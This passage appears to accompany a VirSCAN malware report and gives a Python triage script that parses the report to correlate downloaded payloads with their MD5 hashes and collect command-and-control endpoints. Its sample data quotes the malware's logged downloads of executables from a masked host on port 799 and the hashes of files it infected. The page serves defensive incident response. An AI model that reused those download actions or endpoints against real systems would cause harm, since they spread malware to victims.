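The behavior list above is what a triage script has to consume, and the most useful join in it is between the network and hash sections: each of the five k*.rar downloads is saved as a different Temp\*.exe, yet the "Executable file MD5" section gives every one of them the same hash, so the downloader fetched one payload five times under different names. The following Python is an added example, not VirSCAN's own code. It parses the report's "Behavior description:" / "details:" layout as translated on this page, maps each URLDownloadToFileW target to its hash, and collects the infected-file hashes and the contacted endpoint. SAMPLE_REPORT is a constructed excerpt of this page's entries; the masked host dd****et and the MD5 values are copied exactly as the report prints them.

```python
import re
from collections import defaultdict

# Constructed excerpt of the report above (translated descriptions); only the
# entries needed for the correlation are included.
SAMPLE_REPORT = r"""
Network behavior
Behavior description: Downloads file
details: URLDownloadToFileW: http://dd****et:799/cj//k1.rar ---> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\2D357B6E.exe
C:\Documents and Settings\Administrator\Local Settings\Temp\2D357B6E.exe
URLDownloadToFileW: http://dd****et:799/cj//k2.rar ---> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7BB51BC3.exe
URLDownloadToFileW: http://dd****et:799/cj//k3.rar ---> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\36D27321.exe
Behavior description: Connects to specified site
details: InternetConnectA: ServerName = dd****et, PORT = 799, UserName = , Password = , hSession = 0x00cc0004, hConnect = 0x00cc0008, Flags = 0x00000000
Other behavior
Behavior description: MD5 of modified executable files
details: C:\Program Files\Adobe\Reader 9.0\Reader\LogTransport2.exe ---> 0dde047d9c26e8035bd96d411006ad39
C:\Program Files\e\e.exe ---> 8d533455307b9e64fda610a234db28e0
Behavior description: Executable file MD5
details: C:\Documents and Settings\Administrator\Local Settings\Temp\kdtjpw.exe ---> 56b2c3810dba2e939a8bb9fa36d3cf96
C:\Documents and Settings\Administrator\Local Settings\Temp\2D357B6E.exe ---> fe1d0ee5901dd167ee9b28eece31786c
C:\Documents and Settings\Administrator\Local Settings\Temp\7BB51BC3.exe ---> fe1d0ee5901dd167ee9b28eece31786c
C:\Documents and Settings\Administrator\Local Settings\Temp\36D27321.exe ---> fe1d0ee5901dd167ee9b28eece31786c
"""

SECTION_HEADERS = {"Key behavior", "Process behavior", "File behavior",
                   "Network behavior", "Registry behavior", "Other behavior"}
MD5_RE = re.compile(r"\b[0-9a-f]{32}\b")
URL_RE = re.compile(r"URLDownloadToFileW: (\S+) ---> (\S.*)$")
CONNECT_RE = re.compile(r"ServerName = ([^,]+), PORT = (\d+)")


def parse_behaviors(text):
    """Group 'Behavior description:' / 'details:' lines into {description: [detail lines]}.
    Continuation lines belong to the most recent description; section headers end it
    and 'N/A' details are dropped."""
    behaviors = defaultdict(list)
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTION_HEADERS:
            current = None
            continue
        if line.startswith("Behavior description:"):
            current = line.split(":", 1)[1].strip()
            continue
        if line.startswith("details:"):
            line = line.split(":", 1)[1].strip()
        if current is not None and line and line != "N/A":
            behaviors[current].append(line)
    return dict(behaviors)


def file_hashes(behaviors, key):
    """Turn the 'path ---> md5' lines under `key` into {path: md5}."""
    out = {}
    for line in behaviors.get(key, []):
        path, _, md5 = line.rpartition(" ---> ")
        if MD5_RE.fullmatch(md5):
            out[path.strip()] = md5
    return out


def correlate_downloads(behaviors):
    """Join each URLDownloadToFileW target with its hash from 'Executable file MD5'.
    Matching is by file name because the report mixes 8.3 short paths and long paths
    for the same file. Returns [(url, local_path, md5_or_None)]."""
    by_name = {p.rsplit("\\", 1)[-1].lower(): h
               for p, h in file_hashes(behaviors, "Executable file MD5").items()}
    rows = []
    for line in behaviors.get("Downloads file", []):
        m = URL_RE.match(line)
        if not m:
            continue                       # the repeated long-path lines carry no URL
        url, path = m.group(1), m.group(2).strip()
        rows.append((url, path, by_name.get(path.rsplit("\\", 1)[-1].lower())))
    return rows


def c2_endpoints(behaviors):
    """(host, port) pairs from InternetConnectA lines, host exactly as the report prints it."""
    found = set()
    for line in behaviors.get("Connects to specified site", []):
        m = CONNECT_RE.search(line)
        if m:
            found.add((m.group(1).strip(), int(m.group(2))))
    return sorted(found)


def triage(text):
    """Summarise a report: endpoints, download/hash rows, distinct payload hashes,
    and the post-infection hashes of the host files the sample rewrote."""
    b = parse_behaviors(text)
    downloads = correlate_downloads(b)
    return {"c2": c2_endpoints(b),
            "downloads": downloads,
            "distinct_payloads": {md5 for _, _, md5 in downloads if md5},
            "infected": file_hashes(b, "MD5 of modified executable files")}


if __name__ == "__main__":
    for k, v in triage(SAMPLE_REPORT).items():
        print(k, v)
```

The distinct_payloads set is the number a responder actually wants: one hash to block and hunt for, rather than five file names, and the infected map gives the post-infection hashes to sweep other hosts for.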